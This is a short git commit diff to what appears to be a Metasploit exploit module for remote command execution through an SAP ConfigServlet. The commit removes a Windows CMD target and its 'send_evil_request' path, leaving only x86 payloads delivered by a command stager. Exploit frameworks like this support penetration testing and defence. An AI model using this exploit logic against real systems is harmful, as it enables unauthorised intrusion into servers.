allow only ARCH_X86 payloads

unstable
Andras Kabai 2013-04-24 09:29:47 +02:00
parent 750638e4d6
commit 783cca6c17
1 changed files with 3 additions and 13 deletions

View File

@ -26,15 +26,9 @@ class Metasploit3 < Msf::Exploit
'Targets' =>
[
[
'Windows CMD (Use windows CMD payloads)',
'Windows generic',
{
'Arch' => ARCH_CMD
}
],
[
'Windows x86 (Execute binary payloads via uploaded VBS)',
{
'Arch' => ARCH_X86 #badchars ,;
'Arch' => ARCH_X86
}
]
],
@ -53,11 +47,7 @@ class Metasploit3 < Msf::Exploit
print_status("#{rhost}:#{rport} - Exploiting remote system")
uri = normalize_uri(target_uri.path, 'ConfigServlet')
if target['Arch'] == ARCH_CMD
send_evil_request(uri, payload.encoded)
else
execute_cmdstager( { :linemax => 1500, :nodelete => true, :sap_configservlet_uri => uri })
end
execute_cmdstager( { :linemax => 1500, :nodelete => true, :sap_configservlet_uri => uri })
end
def execute_command(cmd, opts)